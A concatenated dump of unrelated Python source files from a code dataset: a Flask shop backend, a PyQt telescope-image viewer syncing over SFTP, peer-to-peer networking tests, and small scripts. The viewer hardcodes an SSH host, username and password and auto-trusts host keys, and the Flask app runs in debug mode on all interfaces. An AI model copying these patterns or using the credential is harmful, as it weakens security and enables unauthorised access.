request.headers.get('Authorization',None)\n number = request.headers.get('Numbers',None)\n number = int(number)\n l=purchase_record_recommendation(token,number) # return 10 product\n return dumps(l)\n\n#-----------------------------------------------search------------------------------------\n@app.route('/search', methods=['GET'])\ndef flask_search():\n search_word = request.headers.get('search_word',None)\n max_price = int(request.headers.get('max_price',None))\n min_price = int(request.headers.get('min_price',None))\n l = search(search_word,min_price,max_price)\n return dumps(l)\n\n@app.route('/search_with_token', methods=['GET'])\ndef flask_search_with_token():\n token = request.headers.get('Authorization',None)\n search_word = request.headers.get('search_word',None)\n max_price = request.headers.get('max_price',None)\n min_price = request.headers.get('min_price',None)\n l = search_with_token(token,search_word,min_price,max_price)\n return dumps(l)\n\n\n#-------------------------------------------cahtbot-----------------------------\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n j = request.json\n word=j['word']\n l=chatbot_handle(word)\n return dumps(l)\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n word = request.headers.get('word',None)\n l=chatbot_handle(word)\n return dumps(l)\n\n@app.route('/chatbot_get', methods=['GET'])\ndef flask_chatbot_get():\n l=load_chatDB()\n return dumps(l)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000,debug=True)\n","sub_path":"RecommendWebsite/reed/Flask_all.py","file_name":"Flask_all.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"57099401","text":"import pyqtgraph as pg\nfrom PyQt4 import QtCore, QtGui, uic\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import (\n FigureCanvasQTAgg as FigureCanvas,\n NavigationToolbar2QT as NavigationToolbar)\nfrom astropy.io import fits\nfrom sklearn.metrics import mean_squared_error\nfrom photutils.background import Background\nfrom photutils import detect_sources\nfrom photutils.utils import random_cmap\nfrom photutils import source_properties, properties_table\nimport paramiko\n\n# set directory\n#parentDir = r'K:\\Google Drive\\DESI\\protoDESI\\images\\fpc_data'\ndirRemote = r'/home/msdos/SBIG/'\ndirLocal = os.path.join(os.path.expanduser(\"~\"), 'Downloads', 'SBIG')\ndatasetID = ''\ndatasetDirRemote = os.path.join(dirRemote, datasetID)\ndatasetDirLocal = os.path.join(dirLocal, datasetID)\ndomain = 'desisti.kpno.noao.edu'\nusername = 'msdos'\npassword = 'MS-d0s'\nautosync = True\nprintEnabled = True\npg.mkQApp()\n\n#%% Define main window class from UI file\n\nuiPath = os.path.dirname(os.path.abspath(__file__))\nuiFile = os.path.join(uiPath, 'sti_gui.ui')\n[WindowTemplate, TemplateBaseClass] = uic.loadUiType(uiFile)\n\ndef compare_sets(sftp):\n \n setRemote = set(sftp.listdir(datasetDirRemote))\n listRemote = list(setRemote)\n listRemoteConverted = list(listRemote)\n for i in range(len(listRemote)):\n listRemoteConverted[i] = listRemoteConverted[i].replace(':','_')\n setRemoteConverted = set(listRemoteConverted)\n setLocal = set(os.listdir(datasetDirLocal))\n setTransferConverted = setRemoteConverted - (setRemoteConverted & setLocal)\n setTransfer = set(setTransferConverted)\n for filename in setTransferConverted:\n i = listRemoteConverted.index(filename)\n setTransfer.remove(listRemoteConverted[i])\n setTransfer.add(listRemote[i])\n return setTransfer\n\nclass ListeningHost(QtCore.QThread):\n \n emitter = QtCore.pyqtSignal(object)\n \n def __init__(self, sftp):\n \n self.newDataAvailable = False\n self.sftp = sftp\n QtCore.QThread.__init__(self)\n \n def run(self):\n \n while self.newDataAvailable is False:\n \n# print('Listening host is actively checking for new data...')\n setTransfer = compare_sets(self.sftp)\n\n if len(setTransfer) is 0:\n self.newDataAvailable = False\n else:\n self.newDataAvailable = True\n self.emitter.emit(None)\n \n# while self.newDataAvailable is True:\n# self.emitter.emit(None)\n\nclass MainWindow(TemplateBaseClass):\n \n def __init__(self):\n \n TemplateBaseClass.__init__(self)\n # super(MainWindow, self).__init__()\n \n # create the main window\n self.ui = WindowTemplate()\n self.ui.setupUi(self)\n #self.ui.plotBtn.clicked.connect(self.plot)\n self.show()\n self.setWindowTitle('ProtoDESI ST-i Focusing Viewer')\n self.ui.actionSync.triggered.connect(self.sync)\n \n # establish ssh\n self.open_ssh(domain, username, password) \n\n self.updateFileList()\n segFig = Figure()\n self.addmpl(segFig)\n # show first image initially\n if len(self.ui.listRaw) > 0:\n filename = self.ui.listRaw.item(0).text()\n self.updateRaw(filename)\n \n # configure listener\n self.listeningHost = ListeningHost(self.sftp)\n self.listeningHost.emitter.connect(self.receiver)\n self.listeningHost.start()\n self.msg('Listening host started.')\n \n def msg(self, text):\n \n self.ui.statusbar.showMessage(text)\n if printEnabled:\n print(text)\n \n def paramiko_sftp_progress(self, transferred, total):\n \n percentage = transferred/total*100\n total_mb = total/(1024**2)\n self.msg('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n# self.ui.statusbar.showMessage('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n\n \n def addmpl(self, fig):\n \n self.ui.canvas = FigureCanvas(fig)\n self.ui.segViewLayout.addWidget(self.ui.canvas)\n self.ui.canvas.draw()\n self.ui.toolbar = NavigationToolbar(self.ui.canvas, \n self.ui.segView, coordinates=True)\n self.ui.segViewLayout.addWidget(self.ui.toolbar)\n \n def rmmpl(self):\n self.ui.segViewLayout.removeWidget(self.ui.canvas)\n self.ui.canvas.close()\n self.ui.segViewLayout.removeWidget(self.ui.toolbar)\n self.ui.toolbar.close()\n\n def open_ssh(self, domain, user, pw):\n \n self.msg('Establishing SSH...')\n self.ssh = paramiko.SSHClient()\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.ssh.connect(domain, username=user, password=pw)\n \n self.msg('Establishing SFTP...')\n self.sftp = self.ssh.open_sftp()\n \n def sync(self):\n \n # respond to user click on sync button, and perform actual sync\n \n self.msg('Syncing new data to local drive...')\n \n if self.listeningHost.newDataAvailable:\n \n setTransfer = compare_sets(self.sftp)\n self.msg('Files to be transferred: ' + repr(setTransfer))\n \n for filename in setTransfer:\n self.msg('Transferring {} ...'.format(filename))\n filenameLocal = filename.replace(':', '_')\n try:\n self.sftp.get(\n os.path.join(datasetDirRemote, filename), \n os.path.join(datasetDirLocal, filenameLocal),\n callback = self.paramiko_sftp_progress\n )\n self.msg('Transfer is complete: {}.'.format(filename))\n except:\n self.msg('Skipping file: {}'.format(filename))\n pass\n \n self.listeningHost.newDataAvailable = False\n self.listeningHost.start()\n self.updateFileList()\n \n else:\n self.msg('No new data available for sync.')\n \n def receiver(self):\n \n # receiver for listener emitter\n if self.listeningHost.newDataAvailable:\n self.msg('New data available. Sync Now.')\n if autosync:\n self.msg('Autosync is on. Auto-syncing...')\n self.sync()\n else:\n self.msg('No new data available.')\n \n def updateFileList(self):\n \n self.msg('Updating file lists...')\n \n # filename patterns\n os.chdir(dirLocal)\n namePatternRaw = '**/*.fit*'\n imgEntries = glob.glob(namePatternRaw, recursive=True)\n\n # populate list raw\n self.ui.listRaw.clear()\n self.ui.listRaw.addItems(imgEntries)\n \n # populate list master\n self.ui.listMaster.clear()\n self.ui.listMaster.addItems(imgEntries)\n \n def updateRaw(self, filename):\n \n self.msg(repr('Showing image:'+ filename))\n filepath = os.path.join(dirLocal, filename)\n hdu = fits.open(filepath)[0]\n \n # display header\n self.ui.headerView.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.headerView.setFontPointSize(9)\n self.ui.headerView.setPlainText(repr(hdu.header))\n \n # display image selected\n minlevel = np.amin(hdu.data)\n maxlevel = 2000\n self.ui.rawView.show()\n self.ui.rawView.setImage(np.rot90(hdu.data, -1))\n self.ui.rawView.setLevels(minlevel, maxlevel)\n #self.ui.rawView.autoLevels()\n\n def updatePhot(self, filename):\n \n filepath = os.path.join(datasetDirLocal, 'master', filename)\n hdu = fits.open(filepath)[0]\n data = hdu.data\n \n # display master preview\n self.msg('Showing master image:' + repr(filename))\n self.rmmpl()\n segFig = Figure()\n# cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(data, origin='lower', cmap=plt.cm.gray)\n self.addmpl(segFig)\n\n # perform photometry\n self.msg('Performing aperture photometry...')\n self.aperture_photometry(filename)\n \n def aperture_photometry(self, filename):\n\n # aperture photometry from source segmentation\n \n # determine threshold for background detection\n # if LEDoff was used, get threshold from LEDoff/background\n filepath = os.path.join(datasetDirLocal, 'master', filename)\n filenameCombined = '\\t'.join(os.listdir(os.path.join(datasetDirLocal, 'master')))\n if 'master_ledoff_subtracted' in filename:\n self.msg('Using master_ledoff')\n # filepath = os.path.join(datasetDir, 'master', filename)\n hdu = fits.open(filepath)[0]\n data_subtracted = hdu.data\n # calculate threadhold\n ledoff_pred = np.mean(data_subtracted) * np.ones(data_subtracted.shape)\n mse = mean_squared_error(data_subtracted, ledoff_pred) \n rmse = np.sqrt(mse)\n threshold = 7.0 * rmse\n threshold_value = threshold\n \n # if no LEDoff was used, background subtraction is needed\n # there should exist no file named \"subtracted\"\n elif 'master.fit' in filenameCombined \\\n or 'master_normalised.fit' in filenameCombined:\n self.ui.statusbar.showMessage('Using master or master_normalised')\n \n # create preliminary mask \n \"\"\" make_source_mask not yet available in photutils v0.2.1\n wait for v0.3 release\n \"\"\"\n #from photutils import make_source_mask\n #masterMask = make_source_mask(master, snr=2, npixels=5, dilate_size=11)\n \n # background subtraction\n \"\"\" create 2D image of background and background rms and \n apply sigma-clipping to each region in the low-res \n background map to get mean, median, and std/rms. \n sigma-clipping is the most widely used method though not as \n good as using mask; still superior to robust standard \n deviation using median absolute deviation (MAD-STD)\n \"\"\"\n \n \n hdu = fits.open(filepath)[0]\n data = hdu.data\n if 'EXPTIME' in hdu.header:\n exptime = hdu.header['EXPTIME']\n else:\n exptime = hdu.header['EXPREQ']\n \n self.msg('Determining threshold for target detection...')\n # calculate threashold\n # [mean, median, std] = sigma_clipped_stats(master, sigma=3.0, iters=5)\n bkg = Background(data, (100, 100), filter_shape=(3, 3), method='median')\n # bkg = Background(master, (50, 50), filter_size=(3, 3), method='median')\n # plt.imshow(bkg.background, norm=normalisation, origin='lower', cmap=plt.cm.gray)\n plt.imshow(bkg.background, origin='lower', cmap=plt.cm.gray)\n [fig, ax] = plt.subplots(figsize=(8, 8))\n # make background-substracted image\n data_subtracted = data - bkg.background\n # plot\n plt.imshow(data_subtracted, origin='lower', cmap=plt.cm.gray)\n \n # save background subtracted image\n if 'master.fit' in filename:\n hdu_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_subtracted.writeto('master_subtracted.fits', clobber = True)\n elif 'master_normalised.fit' in filename:\n hdu_normalised_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_normalised_subtracted.writeto('master_normalised_subtracted.fits', clobber = True)\n \n # segmentation at a given sigma level, for regional properties\n threshold = 5.0 * bkg.background_rms # since data is background-subtracted\n threshold_value = threshold.flat[0]\n \n self.msg('Threshold for target detection is: ' + repr(threshold_value))\n # perform segmentation whether flat was available or not\n self.msg('Performing segmentation...')\n segm = detect_sources(data_subtracted, threshold, npixels=5)\n \n self.msg('Segmentation labels are:')\n self.msg((str(segm.labels)))\n # measure regional source properties from segmentation\n # the centroid is from image moments, already intensity-weighted\n self.msg('Measuring source properties')\n if 'bkg' in locals():\n props = source_properties(data_subtracted, segm,\n error = bkg.background_rms, background = bkg.background)\n elif 'master_ledoff_subtracted' in filenameCombined:\n filepath = os.path.join(datasetDirLocal, 'master', 'master_ledoff_subtracted.fits')\n hdu = fits.open(filepath)[0]\n master_ledoff_subtracted = hdu.data\n props = source_properties(data_subtracted, segm,\n error = master_ledoff_subtracted - np.mean(master_ledoff_subtracted),\n background = master_ledoff_subtracted)\n \n # instrumental magnitude = -2.5 * log10(flux)\n for i in range(len(props)):\n props[i].mag_instr = -2.5 * np.log10(props[i].source_sum/exptime)\n # source_sum are by definition background-subtracted already\n propsTableColumns = ['id', 'xcentroid', 'ycentroid', 'area', 'max_value',\n 'source_sum', 'mag_instr']\n # there are other properties available, see list of SourceProperties\n # http://photutils.readthedocs.io/en/latest/api/photutils.segmentation.SourceProperties.html#photutils.segmentation.SourceProperties\n \n propsTable = properties_table(props, columns = propsTableColumns)\n self.ui.statusbar.showMessage(repr(propsTable))\n \n # plot segmentated image\n self.rmmpl()\n segFig = Figure()\n cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(segm, origin='lower', cmap=cmapRand)\n axes.plot(propsTable['xcentroid'], propsTable['ycentroid'], ls='none', color='red',\n marker='+', ms=10, lw=1.5)\n self.addmpl(segFig)\n \n # set properties table font and font size\n self.ui.tablePhot.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.tablePhot.setFontPointSize(9)\n self.ui.tablePhot.setPlainText(repr(propsTable))\n \n self.msg('Photometry completed')\n# # plots for visualisation\n# \n# apertures = []\n# for prop in props:\n# position = (prop.xcentroid.value, prop.ycentroid.value)\n# a = prop.semimajor_axis_sigma.value * 3.0\n# b = prop.semiminor_axis_sigma.value * 3.0\n# theta = prop.orientation.value\n# apertures.append(EllipticalAperture(position, a, b, theta=theta))\n# norm = ImageNormalize(stretch=SqrtStretch())\n# fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(18, 18))\n# \n# if 'bkg' in locals():\n# ax1.imshow(master_subtracted, origin='lower', cmap='Greys_r', norm=norm)\n# else:\n# ax1.imshow(master_subtracted_normalised, origin='lower', cmap='Greys_r', norm=norm)\n# ax2.imshow(segm, origin='lower', cmap=cmapRand)\n# for aperture in apertures:\n# aperture.plot(color='blue', lw=1.5, alpha=0.5, ax=ax1)\n# aperture.plot(color='white', lw=1.5, alpha=1.0, ax=ax2)\n\n#%% Start Qt event loop unless running in interactive mode or using pyside\n\nmain = MainWindow()\n\nif __name__ == '__main__':\n\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n \n def raw_item_changed(curr, prev):\n filename = curr.text()\n main.updateRaw(filename)\n \n def master_item_changed(curr, prev):\n filename = curr.text()\n main.updatePhot(filename)\n\n main.ui.listRaw.currentItemChanged.connect(raw_item_changed)\n main.ui.listMaster.currentItemChanged.connect(master_item_changed)\n \n QtGui.QApplication.instance().exec_()","sub_path":"pd_fpc_analyses_of_parker/sti_viewer_standalone/sti_gui.py","file_name":"sti_gui.py","file_ext":"py","file_size_in_byte":16449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"220770798","text":"from unittest import TestCase\nfrom pyp2p.lib import *\nfrom pyp2p.dht_msg import DHT\nfrom pyp2p.net import *\nimport random\nfrom threading import Thread\nimport time\n\nclass test_net(TestCase):\n def test_00000004(self):\n # Test broadcast.\n nodes = [\n {\n \"port\": 40001,\n \"net\": None,\n \"thread\": None\n },\n {\n \"port\": 40002,\n \"net\": None,\n \"thread\": None\n },\n {\n \"port\": 40003,\n \"net\": None,\n \"thread\": None\n }\n ]\n\n def accept_cons(node):\n while node[\"net\"] != None:\n for con in node[\"net\"]:\n x = 1\n\n time.sleep(0.5)\n\n # Buld networks.\n for node in nodes:\n node[\"net\"] = Net(net_type=\"direct\", node_type=\"passive\", passive_port=node[\"port\"], debug=1)\n node[\"net\"].disable_forwarding()\n node[\"net\"].disable_bootstrap()\n node[\"net\"].disable_advertise()\n node[\"net\"].enable_duplicate_ip_cons = 1\n node[\"net\"].start()\n node[\"thread\"] = Thread(target=accept_cons, args=(node,))\n node[\"thread\"].start()\n\n \"\"\"\n Make connections.\n Note: duplicate connections will be rejected resulting in just one connection from one node to the other nodes.\n \"\"\"\n for our_node in nodes:\n for their_node in nodes:\n # Don't connect to ourself.\n if our_node == their_node:\n continue\n\n # Connect to them.\n our_node[\"net\"].add_node(get_lan_ip(), their_node[\"port\"], \"passive\")\n\n # Accept cons:\n for node in nodes:\n node[\"net\"].synchronize()\n\n # Check connection no.\n for node in nodes:\n assert(len(node[\"net\"]) >= 3)\n\n # Test broadcast.\n for node in nodes:\n node[\"net\"].broadcast(\"test\")\n\n # Check for broadcast response on node sockets\n # (Should be on all of them because of duplicate cons.\n for node in nodes:\n for con in node[\"net\"]:\n con.set_blocking(blocking=1, timeout=5)\n line = con.recv_line()\n assert(con.connected)\n assert(line == \"test\")\n\n # Close cons.\n for node in nodes:\n for con in node[\"net\"]:\n con.close()\n\n node[\"net\"].stop()\n\n # And ... stop threads.\n node[\"net\"] = None\n\n def test_00000001(self):\n # Test seen messages\n from pyp2p.net import rendezvous_servers\n net = Net(debug=1, nat_type=\"preserving\", node_type=\"simultaneous\", net_type=\"direct\")\n net.disable_advertise()\n net.disable_bootstrap()\n net.disable_duplicates()\n net.start()\n con = net.add_node(rendezvous_servers[0][\"addr\"], rendezvous_servers[0][\"port\"], \"passive\")\n\n # Test source TCP.\n con.send_line(\"SOURCE TCP\")\n con.send_line(\"SOURCE TCP 0\")\n time.sleep(2)\n replies = []\n for reply in con:\n replies.append(reply)\n\n print(replies)\n assert(len(replies) == 1)\n\n # Disable duplicates.\n clear_seen_messages()\n net.enable_duplicates = 1\n con.send_line(\"SOURCE TCP\")\n con.send_line(\"SOURCE TCP 0\")\n time.sleep(2)\n replies = []\n for reply in con:\n replies.append(reply)\n\n assert(len(replies) == 2)\n\n def test_00000003(self):\n # Test validate node\n net = Net(debug=1)\n net.disable_advertise()\n net.disable_bootstrap()\n assert(net.validate_node(\"127.0.0.1\") != 1)\n assert(net.validate_node(\"0.0.0.0\") != 1)\n assert(net.validate_node(get_lan_ip()) != 1)\n assert(net.validate_node(get_lan_ip(), net.passive_port) != 1)\n assert(net.validate_node(net.passive_bind) != 1)\n assert(net.validate_node(net.passive_bind, net.passive_port) != 1)\n assert(net.validate_node(get_wan_ip()) != 1)\n assert(net.validate_node(\"8.8.8.8\"))\n assert(net.validate_node(\"8.8.8.8\", 80000) != 1)\n net.stop()\n\n def test_00000002(self):\n # Test add node.\n net = Net(debug=1, nat_type=\"preserving\", node_type=\"simultaneous\", net_type=\"direct\")\n net.disable_advertise()\n net.disable_bootstrap()\n net.start()\n\n # Test passive outbound connection.\n net.add_node(forwarding_servers[0][\"addr\"], forwarding_servers[0][\"port\"], \"passive\")\n assert(len(net.outbound) == 1)\n assert(net.get_connection_no() == 1)\n cons = []\n for con in net:\n cons.append(con)\n assert(len(cons))\n\n # 162.218.239.6\n\n def threaded_add_node(node_ip, node_port, node_type, net, events):\n def add_node(node_ip, node_port, node_type, net, events):\n con = net.add_node(node_ip, node_port, node_type)\n if con != None:\n events[\"success\"](con)\n\n t = Thread(target=add_node, args=(node_ip, node_port, node_type, net, events))\n t.start()\n\n cons = []\n def success_wrapper(cons):\n def success(con):\n cons.append(con)\n\n return success\n\n events = {\n \"success\": success_wrapper(cons)\n }\n\n # Test active simultaneous connection.\n # NAT punching node 1:\n timeout = time.time() + 15\n threaded_add_node(\"192.187.97.131\", 0, \"simultaneous\", net, events)\n while not len(cons) and time.time() <= timeout:\n time.sleep(1)\n\n if not len(cons):\n timeout = time.time() + 15\n threaded_add_node(\"162.218.239.6\", 0, \"simultaneous\", net, events)\n\n while not len(cons) and time.time() < timeout:\n time.sleep(1)\n assert(0)\n\n if len(cons):\n for con in cons:\n con.close()\n\n def failure_notify(con):\n assert(0)\n\n def success_notify(con):\n con.close()\n\n # Test threading hasn't broken the timing.\n events = {\n \"failure\": failure_notify,\n \"success\": success_notify\n }\n\n # This is the not-NATed test node.\n net.unl.connect(\"AQAAAAAAAAAAAAAAAAAAAAAAAAAAc2dtRMUG79qiBu/aos6tMVYAAAAAWMYQkz0OjrI=\", events)\n\n assert(net.validate_node(forwarding_servers[0][\"addr\"], forwarding_servers[0][\"port\"]))\n\n net.stop()\n\n def test_queued_sim_open(self):\n # Test add node.\n net = Net(debug=1, nat_type=\"preserving\", node_type=\"simultaneous\", net_type=\"direct\")\n net.disable_advertise()\n net.disable_bootstrap()\n net.start()\n\n net.unl.connect(\"AQAAAAAAAAAAAAAAAAAAAAAAAAAAc2dtRMUG79qiBu/aoqg7O1YAAAAAGkXKuVrNDYE=\", events=None)\n net.unl.connect(\"AQAAAAAAAAAAAAAAAAAAAAAAAAAAc2dtRMWDYbvALwOowGU8O1YAAAAATYLXRfdc5tc=\", events=None)\n time.sleep(2)\n assert(len(net.unl.pending_sim_open) == 2)\n net.stop()\n\n","sub_path":"tests/test_net.py","file_name":"test_net.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"520922188","text":"class Error(Exception):\n pass\nclass menu:\n def __init__(self):\n self.d={}\n def show(self):\n print(\"\\tMENU\\n\")\n for i in self.d:\n print(i,\" \",self.d[i])\n def add(self,st,p):\n self.d[st]=p\nclass order():\n def __init__(self,me):\n self.d1={}\n self.d=me.d\n def placeo(self,st1,qt):\n if(st1 in self.d):\n self.d1[st1]=qt\n else:\n raise (Error(st1,\" not in menu\"))\n def disporder(self):\n tot=0\n print(\"Order\\tQuantity\\tPrice\")\n for i in self.d1:\n print(i,\"\\t\",self.d1[i],\"\\t\\t\",self.d1[i]*self.d[i])\n tot+=self.d1[i]*self.d[i]\n print(\"\\nThe total cost is \",tot)\nc=menu()\nc.add(\"Idly\",20)\nfor i in range(1000):\n st1=str(input(\"Enter food item:\"))\n p1=int(input(\"Enter cost:\"))\n c.add(st1,p1)\n ch=str(input(\"Do you wish to continue adding(y/n):\"))\n if(ch=='n'):\n break\nc.show()\no=order(c)\nfor i in range(100):\n s=str(input(\"Enter order from the menu:\"))\n q=int(input(\"Enter quantity:\"))\n o.placeo(s,q)\n c1=str(input(\"Do you wish to order more(y/n):\"))\n if(c1=='n'):\n break\no.disporder()\n","sub_path":"order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"87651028","text":"import unittest\nimport clics\nimport csd\nimport datsemshift\nimport pollex\nimport prototai\nimport stedt\n\n\nclass Integration(unittest.TestCase):\n def test_clics(self):\n dust = clics.semshift(\"dust\")\n self.assertSetEqual(set(dust),\n {'ASH', 'EARTH (SOIL)', 'FOG', 'SMOKE (EXHAUST)', 'LAND', 'SAND', 'FLOUR', 'CLAY', 'MUD',\n 'CLOUD'})\n\n def test_csd(self):\n grape = csd.semshift(\"grape\")\n self.assertSetEqual(set(grape),\n {'raspberry', 'grapes', 'strawberry', 'mayhaws', 'strawberries', '[berry, grape]',\n 'berry, fruit', 'grape', 'berry, berries', 'chokecherry', 'berry', 'bullberry',\n 'blackberry'}\n )\n\n def test_pollex(self):\n chisel = pollex.semshift(\"chisel\")\n self.assertSetEqual(set(chisel), {'Tattooing stick bearing bones or needles', 'Tattooing chisel',\n \"Tattooer's serrated chisel of bird-bone\"})\n\n def test_prototai(self):\n tiger = prototai.semshift(\"tiger\")\n self.assertSetEqual(set(tiger), {'tiger'})\n\n def test_stedt(self):\n scorpion = stedt.semshift(\"scorpion\")\n self.assertSetEqual(set(scorpion),\n {'scorpion', 'scorpion [m-bug]', 'shrimp', 'scorpion / crab / shrimp', 'shrimp / scorpion',\n 'crab, crawfish'})\n\n def test_datsemshift(self):\n dss = datsemshift.DatSemShift()\n closed = dss.semshift(\"closed\")\n self.assertSetEqual(set(closed), {'dark (adj.)', 'strong (of liquid or smell)', 'cloudy'})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"11075906","text":"import argparse\r\nimport sys\r\nimport os\r\nimport functools\r\nimport random\r\nimport statistics\r\n\r\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\r\n\r\nfrom IPAlgorithm import radix\r\nimport IPAlgorithm.MultiSourceTimedFlowAlgorithm\r\n\r\nfrom pyshark.packet import layer\r\nclass LayerFieldsContainer(layer.LayerFieldsContainer):\r\n def __new__(cls, main_field, *args, **kwargs):\r\n if hasattr(main_field, 'get_default_value'):\r\n obj = str.__new__(cls, main_field.get_default_value(), *args, **kwargs)\r\n else:\r\n obj = str.__new__(cls, main_field, *args, **kwargs)\r\n obj.fields = [main_field]\r\n return obj\r\nlayer.LayerFieldsContainer = LayerFieldsContainer\r\n\r\nTESTED_ASES = 10\r\n\r\ndef main(pickle_src, drop_rate, *args, **kwargs):\r\n packets, prefixes_set = IPAlgorithm.MultiSourceTimedFlowAlgorithm.get_packets_pcap(None, pickle_src)\r\n prefixes = list(prefixes_set)\r\n extract = getattr(IPAlgorithm.MultiSourceTimedFlowAlgorithm.MultiSourceTimedFlowAlgorithm, '_extract_ttl_diff')\r\n\r\n prefix_radix = radix.Radix()\r\n for prefix in prefixes:\r\n rnode = prefix_radix.add(prefix.exploded)\r\n rnode.data[\"count\"] = 0\r\n rnode.data[\"packets\"] = []\r\n\r\n for packet in packets:\r\n rnode = prefix_radix.search_best(packet.src.exploded)\r\n if rnode is None:\r\n continue\r\n rnode.data[\"count\"]+=1\r\n flow = functools.reduce(lambda x, y: str(x) + '-' + str(y),\r\n [packet.src, packet.src_port, packet.dst, packet.dst_port], packet)\r\n rnode.data[\"packets\"].append({'flow':flow, 'hop' : extract(packet.ttl)})\r\n\r\n top = {k : k.data['packets'] for k in prefix_radix.nodes() if k in sorted(prefix_radix.nodes(), key=lambda n:n.data['count'], reverse=True)[:TESTED_ASES]}\r\n\r\n # Remove flows\r\n all_flows, averages = calc_averages(top)\r\n number_to_remove = int(drop_rate * len(all_flows))\r\n removed_flows = random.sample(all_flows, number_to_remove)\r\n for AS, packets in top.items():\r\n new_packets = list(filter(lambda p: p['flow'] not in removed_flows, packets))\r\n top[AS] = new_packets\r\n\r\n _, new_averages = calc_averages(top)\r\n\r\n packet_variance = statistics.variance([averages[AS][0] - new_averages[AS][0] for AS in top])\r\n flow_variance = statistics.variance([averages[AS][1] - new_averages[AS][1] for AS in top])\r\n\r\n print(\"Packet variance: %f, Flow variance: %f\"%(packet_variance, flow_variance))\r\n\r\n\r\ndef calc_averages(ASToPackets):\r\n # Calculate flows and averages\r\n averages = {}\r\n all_flows = set()\r\n for AS in ASToPackets:\r\n packets = ASToPackets[AS]\r\n flows = set()\r\n flows_to_ttl = {}\r\n for packet in packets:\r\n flow = packet['flow']\r\n flows.add(flow)\r\n if flow not in flows_to_ttl:\r\n flows_to_ttl[flow] = packet['hop']\r\n\r\n all_flows = all_flows.union(flows)\r\n packet_average = sum(map(lambda packet: (packet['hop']), packets)) / len(packets)\r\n flows_average = sum([flows_to_ttl[flow] for flow in flows_to_ttl]) / len(flows_to_ttl)\r\n averages[AS] = (packet_average, flows_average)\r\n\r\n return all_flows, averages\r\n\r\n\r\nif (__name__ == \"__main__\"):\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('pickle_src', type=str)\r\n parser.add_argument('--drop_rate', type=float, default=0.5)\r\n\r\n args = parser.parse_args()\r\n main(**vars(args))\r\n","sub_path":"Test and validation/test_average.py","file_name":"test_average.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"355522747","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nimport h5py\n\nfrom tvb_scripts.io.h5_writer import H5Writer\nfrom tvb_scripts.utils.log_error_utils import initialize_logger\n\n\nclass H5ReaderBase(object):\n logger = initialize_logger(__name__)\n\n H5_TYPE_ATTRIBUTE = H5Writer().H5_TYPE_ATTRIBUTE\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n H5_TYPES_ATTRUBUTES = [H5_TYPE_ATTRIBUTE, H5_SUBTYPE_ATTRIBUTE]\n\n def _open_file(self, name, path=None, h5_file=None):\n if h5_file is None:\n if not os.path.isfile(path):\n raise ValueError(\"%s file %s does not exist\" % (name, path))\n\n self.logger.info(\"Starting to read %s from: %s\" % (name, path))\n h5_file = h5py.File(path, 'r', libver='latest')\n return h5_file\n\n def _close_file(self, h5_file, close_file=True):\n if close_file:\n h5_file.close()\n\n def _log_success(self, name, path=None):\n if path is not None:\n self.logger.info(\"Successfully read %s from: %s\" % (name, path))\n\n\nclass H5GroupHandlers(object):\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n\n def read_dictionary_from_group(self, group, type=None):\n dictionary = dict()\n for dataset in group.keys():\n dictionary.update({dataset: group[dataset][()]})\n for attr in group.attrs.keys():\n dictionary.update({attr: group.attrs[attr]})\n if type is None:\n type = group.attrs[self.H5_SUBTYPE_ATTRIBUTE]\n else:\n return dictionary\n","sub_path":"tvb_scripts/io/h5_reader_base.py","file_name":"h5_reader_base.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"284209490","text":"class Solution(object):\n def findClosestElements(self, arr, k, x):\n \"\"\"\n :type arr: List[int]\n :type k: int\n :type x: int\n :rtype: List[int]\n \"\"\"\n\n while len(arr) > k:\n start, end = 0, len(arr) - 1\n if x - arr[start] <= arr[end] - x:\n arr.pop()\n else:\n arr.pop(0)\n\n return arr\n\n","sub_path":"LPractice/658. Find K Closest Elements.py","file_name":"658. Find K Closest Elements.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"561655825","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nimport logging\nfrom datetime import datetime\nfrom datetime 